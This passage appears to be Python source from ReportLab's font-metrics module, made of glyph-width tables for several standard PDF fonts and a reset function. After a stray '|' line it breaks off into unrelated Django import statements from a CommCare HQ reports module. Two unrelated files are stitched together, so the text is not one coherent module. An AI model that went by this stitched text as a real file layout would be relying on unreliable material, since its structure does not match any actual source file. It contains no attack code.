'quotedbl': 355,
'quotedblbase': 333,
'quotedblleft': 333,
'quotedblright': 333,
'quoteleft': 222,
'quoteright': 222,
'quotesinglbase': 222,
'quotesingle': 191,
'r': 333,
'registered': 737,
'ring': 333,
's': 500,
'scaron': 500,
'section': 556,
'semicolon': 278,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 278,
'thorn': 556,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 556,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-BoldOblique'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 722,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 556,
'K': 722,
'L': 611,
'Lslash': 611,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 722,
'aring': 556,
'asciicircum': 584,
'asciitilde': 584,
'asterisk': 389,
'at': 975,
'atilde': 556,
'b': 611,
'backslash': 278,
'bar': 280,
'braceleft': 389,
'braceright': 389,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 280,
'bullet': 350,
'c': 556,
'caron': 333,
'ccedilla': 556,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 333,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 611,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 611,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 611,
'five': 556,
'fl': 611,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 611,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 611,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 556,
'l': 278,
'less': 584,
'logicalnot': 584,
'lslash': 278,
'm': 889,
'macron': 333,
'minus': 584,
'mu': 611,
'multiply': 584,
'n': 611,
'nine': 556,
'ntilde': 611,
'numbersign': 556,
'o': 611,
'oacute': 611,
'ocircumflex': 611,
'odieresis': 611,
'oe': 944,
'ogonek': 333,
'ograve': 611,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 611,
'p': 611,
'paragraph': 556,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 611,
'question': 611,
'questiondown': 611,
'quotedbl': 474,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 278,
'quoteright': 278,
'quotesinglbase': 278,
'quotesingle': 238,
'r': 389,
'registered': 737,
'ring': 333,
's': 556,
'scaron': 556,
'section': 556,
'semicolon': 333,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 333,
'thorn': 611,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 611,
'uacute': 611,
'ucircumflex': 611,
'udieresis': 611,
'ugrave': 611,
'underscore': 556,
'v': 556,
'w': 778,
'x': 556,
'y': 556,
'yacute': 556,
'ydieresis': 556,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
_w = {}
for charname in widthsByFontGlyph['Helvetica'].keys():
_w[charname] = 600
widthsByFontGlyph['Courier'] = _w
widthsByFontGlyph['Courier-Bold'] = _w
widthsByFontGlyph['Courier-Oblique'] = _w
widthsByFontGlyph['Courier-BoldOblique'] = _w
widthsByFontGlyph['Times-Roman'] = {'A': 722,
'AE': 889,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 667,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 611,
'Eacute': 611,
'Ecircumflex': 611,
'Edieresis': 611,
'Egrave': 611,
'Eth': 722,
'Euro': 500,
'F': 556,
'G': 722,
'H': 722,
'I': 333,
'Iacute': 333,
'Icircumflex': 333,
'Idieresis': 333,
'Igrave': 333,
'J': 389,
'K': 722,
'L': 611,
'Lslash': 611,
'M': 889,
'N': 722,
'Ntilde': 722,
'O': 722,
'OE': 889,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 556,
'Q': 722,
'R': 667,
'S': 556,
'Scaron': 556,
'T': 611,
'Thorn': 556,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 722,
'W': 944,
'X': 722,
'Y': 722,
'Yacute': 722,
'Ydieresis': 722,
'Z': 611,
'Zcaron': 611,
'a': 444,
'aacute': 444,
'acircumflex': 444,
'acute': 333,
'adieresis': 444,
'ae': 667,
'agrave': 444,
'ampersand': 778,
'aring': 444,
'asciicircum': 469,
'asciitilde': 541,
'asterisk': 500,
'at': 921,
'atilde': 444,
'b': 500,
'backslash': 278,
'bar': 200,
'braceleft': 480,
'braceright': 480,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 200,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 278,
'comma': 250,
'copyright': 760,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 564,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 564,
'eth': 500,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 564,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 500,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 500,
'l': 278,
'less': 564,
'logicalnot': 564,
'lslash': 278,
'm': 778,
'macron': 333,
'minus': 564,
'mu': 500,
'multiply': 564,
'n': 500,
'nine': 500,
'ntilde': 500,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 276,
'ordmasculine': 310,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 453,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 564,
'plusminus': 564,
'q': 500,
'question': 444,
'questiondown': 444,
'quotedbl': 408,
'quotedblbase': 444,
'quotedblleft': 444,
'quotedblright': 444,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 180,
'r': 333,
'registered': 760,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 278,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 980,
'two': 500,
'twosuperior': 300,
'u': 500,
'uacute': 500,
'ucircumflex': 500,
'udieresis': 500,
'ugrave': 500,
'underscore': 500,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 500,
'z': 444,
'zcaron': 444,
'zero': 500}
widthsByFontGlyph['Times-Bold'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 500,
'F': 611,
'G': 778,
'H': 778,
'I': 389,
'Iacute': 389,
'Icircumflex': 389,
'Idieresis': 389,
'Igrave': 389,
'J': 500,
'K': 778,
'L': 667,
'Lslash': 667,
'M': 944,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 611,
'Q': 778,
'R': 722,
'S': 556,
'Scaron': 556,
'T': 667,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 722,
'W': 1000,
'X': 722,
'Y': 722,
'Yacute': 722,
'Ydieresis': 722,
'Z': 667,
'Zcaron': 667,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 722,
'agrave': 500,
'ampersand': 833,
'aring': 500,
'asciicircum': 581,
'asciitilde': 520,
'asterisk': 500,
'at': 930,
'atilde': 500,
'b': 556,
'backslash': 278,
'bar': 220,
'braceleft': 394,
'braceright': 394,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 220,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 747,
'currency': 500,
'd': 556,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 570,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 570,
'eth': 500,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 556,
'grave': 333,
'greater': 570,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 333,
'k': 556,
'l': 278,
'less': 570,
'logicalnot': 570,
'lslash': 278,
'm': 833,
'macron': 333,
'minus': 570,
'mu': 556,
'multiply': 570,
'n': 556,
'nine': 500,
'ntilde': 556,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 300,
'ordmasculine': 330,
'oslash': 500,
'otilde': 500,
'p': 556,
'paragraph': 540,
'parenleft': 333,
'parenright': 333,
'percent': 1000,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 570,
'plusminus': 570,
'q': 556,
'question': 500,
'questiondown': 500,
'quotedbl': 555,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 278,
'r': 444,
'registered': 747,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 333,
'thorn': 556,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 1000,
'two': 500,
'twosuperior': 300,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 500,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 500,
'z': 444,
'zcaron': 444,
'zero': 500}
widthsByFontGlyph['Times-Italic'] = {'A': 611,
'AE': 889,
'Aacute': 611,
'Acircumflex': 611,
'Adieresis': 611,
'Agrave': 611,
'Aring': 611,
'Atilde': 611,
'B': 611,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 611,
'Eacute': 611,
'Ecircumflex': 611,
'Edieresis': 611,
'Egrave': 611,
'Eth': 722,
'Euro': 500,
'F': 611,
'G': 722,
'H': 722,
'I': 333,
'Iacute': 333,
'Icircumflex': 333,
'Idieresis': 333,
'Igrave': 333,
'J': 444,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 667,
'Ntilde': 667,
'O': 722,
'OE': 944,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 611,
'Q': 722,
'R': 611,
'S': 500,
'Scaron': 500,
'T': 556,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 611,
'W': 833,
'X': 611,
'Y': 556,
'Yacute': 556,
'Ydieresis': 556,
'Z': 556,
'Zcaron': 556,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 667,
'agrave': 500,
'ampersand': 778,
'aring': 500,
'asciicircum': 422,
'asciitilde': 541,
'asterisk': 500,
'at': 920,
'atilde': 500,
'b': 500,
'backslash': 278,
'bar': 275,
'braceleft': 400,
'braceright': 400,
'bracketleft': 389,
'bracketright': 389,
'breve': 333,
'brokenbar': 275,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 760,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 675,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 889,
'emdash': 889,
'endash': 500,
'equal': 675,
'eth': 500,
'exclam': 333,
'exclamdown': 389,
'f': 278,
'fi': 500,
'five': 500,
'fl': 500,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 675,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 500,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 444,
'l': 278,
'less': 675,
'logicalnot': 675,
'lslash': 278,
'm': 722,
'macron': 333,
'minus': 675,
'mu': 500,
'multiply': 675,
'n': 500,
'nine': 500,
'ntilde': 500,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 667,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 276,
'ordmasculine': 310,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 523,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 675,
'plusminus': 675,
'q': 500,
'question': 500,
'questiondown': 500,
'quotedbl': 420,
'quotedblbase': 556,
'quotedblleft': 556,
'quotedblright': 556,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 214,
'r': 389,
'registered': 760,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 980,
'two': 500,
'twosuperior': 300,
'u': 500,
'uacute': 500,
'ucircumflex': 500,
'udieresis': 500,
'ugrave': 500,
'underscore': 500,
'v': 444,
'w': 667,
'x': 444,
'y': 444,
'yacute': 444,
'ydieresis': 444,
'yen': 500,
'z': 389,
'zcaron': 389,
'zero': 500}
widthsByFontGlyph['Times-BoldItalic'] = {'A': 667,
'AE': 944,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 500,
'F': 667,
'G': 722,
'H': 778,
'I': 389,
'Iacute': 389,
'Icircumflex': 389,
'Idieresis': 389,
'Igrave': 389,
'J': 500,
'K': 667,
'L': 611,
'Lslash': 611,
'M': 889,
'N': 722,
'Ntilde': 722,
'O': 722,
'OE': 944,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 611,
'Q': 722,
'R': 667,
'S': 556,
'Scaron': 556,
'T': 611,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 889,
'X': 667,
'Y': 611,
'Yacute': 611,
'Ydieresis': 611,
'Z': 611,
'Zcaron': 611,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 722,
'agrave': 500,
'ampersand': 778,
'aring': 500,
'asciicircum': 570,
'asciitilde': 570,
'asterisk': 500,
'at': 832,
'atilde': 500,
'b': 500,
'backslash': 278,
'bar': 220,
'braceleft': 348,
'braceright': 348,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 220,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 747,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 570,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 570,
'eth': 500,
'exclam': 389,
'exclamdown': 389,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 570,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 500,
'l': 278,
'less': 570,
'logicalnot': 606,
'lslash': 278,
'm': 778,
'macron': 333,
'minus': 606,
'mu': 576,
'multiply': 570,
'n': 556,
'nine': 500,
'ntilde': 556,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 266,
'ordmasculine': 300,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 500,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 570,
'plusminus': 570,
'q': 500,
'question': 500,
'questiondown': 500,
'quotedbl': 555,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 278,
'r': 389,
'registered': 747,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 1000,
'two': 500,
'twosuperior': 300,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 500,
'v': 444,
'w': 667,
'x': 500,
'y': 444,
'yacute': 444,
'ydieresis': 444,
'yen': 500,
'z': 389,
'zcaron': 389,
'zero': 500}
widthsByFontGlyph['Symbol'] = {'Alpha': 722,
'Beta': 667,
'Chi': 722,
'Delta': 612,
'Epsilon': 611,
'Eta': 722,
'Euro': 750,
'Gamma': 603,
'Ifraktur': 686,
'Iota': 333,
'Kappa': 722,
'Lambda': 686,
'Mu': 889,
'Nu': 722,
'Omega': 768,
'Omicron': 722,
'Phi': 763,
'Pi': 768,
'Psi': 795,
'Rfraktur': 795,
'Rho': 556,
'Sigma': 592,
'Tau': 611,
'Theta': 741,
'Upsilon': 690,
'Upsilon1': 620,
'Xi': 645,
'Zeta': 611,
'aleph': 823,
'alpha': 631,
'ampersand': 778,
'angle': 768,
'angleleft': 329,
'angleright': 329,
'apple': 790,
'approxequal': 549,
'arrowboth': 1042,
'arrowdblboth': 1042,
'arrowdbldown': 603,
'arrowdblleft': 987,
'arrowdblright': 987,
'arrowdblup': 603,
'arrowdown': 603,
'arrowhorizex': 1000,
'arrowleft': 987,
'arrowright': 987,
'arrowup': 603,
'arrowvertex': 603,
'asteriskmath': 500,
'bar': 200,
'beta': 549,
'braceex': 494,
'braceleft': 480,
'braceleftbt': 494,
'braceleftmid': 494,
'bracelefttp': 494,
'braceright': 480,
'bracerightbt': 494,
'bracerightmid': 494,
'bracerighttp': 494,
'bracketleft': 333,
'bracketleftbt': 384,
'bracketleftex': 384,
'bracketlefttp': 384,
'bracketright': 333,
'bracketrightbt': 384,
'bracketrightex': 384,
'bracketrighttp': 384,
'bullet': 460,
'carriagereturn': 658,
'chi': 549,
'circlemultiply': 768,
'circleplus': 768,
'club': 753,
'colon': 278,
'comma': 250,
'congruent': 549,
'copyrightsans': 790,
'copyrightserif': 790,
'degree': 400,
'delta': 494,
'diamond': 753,
'divide': 549,
'dotmath': 250,
'eight': 500,
'element': 713,
'ellipsis': 1000,
'emptyset': 823,
'epsilon': 439,
'equal': 549,
'equivalence': 549,
'eta': 603,
'exclam': 333,
'existential': 549,
'five': 500,
'florin': 500,
'four': 500,
'fraction': 167,
'gamma': 411,
'gradient': 713,
'greater': 549,
'greaterequal': 549,
'heart': 753,
'infinity': 713,
'integral': 274,
'integralbt': 686,
'integralex': 686,
'integraltp': 686,
'intersection': 768,
'iota': 329,
'kappa': 549,
'lambda': 549,
'less': 549,
'lessequal': 549,
'logicaland': 603,
'logicalnot': 713,
'logicalor': 603,
'lozenge': 494,
'minus': 549,
'minute': 247,
'mu': 576,
'multiply': 549,
'nine': 500,
'notelement': 713,
'notequal': 549,
'notsubset': 713,
'nu': 521,
'numbersign': 500,
'omega': 686,
'omega1': 713,
'omicron': 549,
'one': 500,
'parenleft': 333,
'parenleftbt': 384,
'parenleftex': 384,
'parenlefttp': 384,
'parenright': 333,
'parenrightbt': 384,
'parenrightex': 384,
'parenrighttp': 384,
'partialdiff': 494,
'percent': 833,
'period': 250,
'perpendicular': 658,
'phi': 521,
'phi1': 603,
'pi': 549,
'plus': 549,
'plusminus': 549,
'product': 823,
'propersubset': 713,
'propersuperset': 713,
'proportional': 713,
'psi': 686,
'question': 444,
'radical': 549,
'radicalex': 500,
'reflexsubset': 713,
'reflexsuperset': 713,
'registersans': 790,
'registerserif': 790,
'rho': 549,
'second': 411,
'semicolon': 278,
'seven': 500,
'sigma': 603,
'sigma1': 439,
'similar': 549,
'six': 500,
'slash': 278,
'space': 250,
'spade': 753,
'suchthat': 439,
'summation': 713,
'tau': 439,
'therefore': 863,
'theta': 521,
'theta1': 631,
'three': 500,
'trademarksans': 786,
'trademarkserif': 890,
'two': 500,
'underscore': 500,
'union': 768,
'universal': 713,
'upsilon': 576,
'weierstrass': 987,
'xi': 493,
'zero': 500,
'zeta': 494}
widthsByFontGlyph['ZapfDingbats'] = {'a1': 974,
'a10': 692,
'a100': 668,
'a101': 732,
'a102': 544,
'a103': 544,
'a104': 910,
'a105': 911,
'a106': 667,
'a107': 760,
'a108': 760,
'a109': 626,
'a11': 960,
'a110': 694,
'a111': 595,
'a112': 776,
'a117': 690,
'a118': 791,
'a119': 790,
'a12': 939,
'a120': 788,
'a121': 788,
'a122': 788,
'a123': 788,
'a124': 788,
'a125': 788,
'a126': 788,
'a127': 788,
'a128': 788,
'a129': 788,
'a13': 549,
'a130': 788,
'a131': 788,
'a132': 788,
'a133': 788,
'a134': 788,
'a135': 788,
'a136': 788,
'a137': 788,
'a138': 788,
'a139': 788,
'a14': 855,
'a140': 788,
'a141': 788,
'a142': 788,
'a143': 788,
'a144': 788,
'a145': 788,
'a146': 788,
'a147': 788,
'a148': 788,
'a149': 788,
'a15': 911,
'a150': 788,
'a151': 788,
'a152': 788,
'a153': 788,
'a154': 788,
'a155': 788,
'a156': 788,
'a157': 788,
'a158': 788,
'a159': 788,
'a16': 933,
'a160': 894,
'a161': 838,
'a162': 924,
'a163': 1016,
'a164': 458,
'a165': 924,
'a166': 918,
'a167': 927,
'a168': 928,
'a169': 928,
'a17': 945,
'a170': 834,
'a171': 873,
'a172': 828,
'a173': 924,
'a174': 917,
'a175': 930,
'a176': 931,
'a177': 463,
'a178': 883,
'a179': 836,
'a18': 974,
'a180': 867,
'a181': 696,
'a182': 874,
'a183': 760,
'a184': 946,
'a185': 865,
'a186': 967,
'a187': 831,
'a188': 873,
'a189': 927,
'a19': 755,
'a190': 970,
'a191': 918,
'a192': 748,
'a193': 836,
'a194': 771,
'a195': 888,
'a196': 748,
'a197': 771,
'a198': 888,
'a199': 867,
'a2': 961,
'a20': 846,
'a200': 696,
'a201': 874,
'a202': 974,
'a203': 762,
'a204': 759,
'a205': 509,
'a206': 410,
'a21': 762,
'a22': 761,
'a23': 571,
'a24': 677,
'a25': 763,
'a26': 760,
'a27': 759,
'a28': 754,
'a29': 786,
'a3': 980,
'a30': 788,
'a31': 788,
'a32': 790,
'a33': 793,
'a34': 794,
'a35': 816,
'a36': 823,
'a37': 789,
'a38': 841,
'a39': 823,
'a4': 719,
'a40': 833,
'a41': 816,
'a42': 831,
'a43': 923,
'a44': 744,
'a45': 723,
'a46': 749,
'a47': 790,
'a48': 792,
'a49': 695,
'a5': 789,
'a50': 776,
'a51': 768,
'a52': 792,
'a53': 759,
'a54': 707,
'a55': 708,
'a56': 682,
'a57': 701,
'a58': 826,
'a59': 815,
'a6': 494,
'a60': 789,
'a61': 789,
'a62': 707,
'a63': 687,
'a64': 696,
'a65': 689,
'a66': 786,
'a67': 787,
'a68': 713,
'a69': 791,
'a7': 552,
'a70': 785,
'a71': 791,
'a72': 873,
'a73': 761,
'a74': 762,
'a75': 759,
'a76': 892,
'a77': 892,
'a78': 788,
'a79': 784,
'a8': 537,
'a81': 438,
'a82': 138,
'a83': 277,
'a84': 415,
'a85': 509,
'a86': 410,
'a87': 234,
'a88': 234,
'a89': 390,
'a9': 577,
'a90': 390,
'a91': 276,
'a92': 276,
'a93': 317,
'a94': 317,
'a95': 334,
'a96': 334,
'a97': 392,
'a98': 392,
'a99': 668,
'space': 278}
def _reset(
initial_dicts=dict(
ascent_descent=ascent_descent.copy(),
fontsByBaseEnc=fontsByBaseEnc.copy(),
fontsByName=fontsByName.copy(),
standardFontAttributes=standardFontAttributes.copy(),
widthVectorsByFont=widthVectorsByFont.copy(),
widthsByFontGlyph=widthsByFontGlyph.copy(),
)
):
for k,v in initial_dicts.iteritems():
d=globals()[k]
d.clear()
d.update(v)
from reportlab.rl_config import register_reset
register_reset(_reset)
del register_reset
|
import logging
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from corehq.apps.adm.dispatcher import ADMSectionDispatcher
from corehq.apps.adm.models import REPORT_SECTION_OPTIONS, ADMReport
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn, DTSortType
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
from corehq.apps.reports.standard import DatespanMixin, ProjectReportParametersMixin
from dimagi.utils.decorators.memoized import memoized
from django.utils.translation import ugettext as _, ugettext_noop
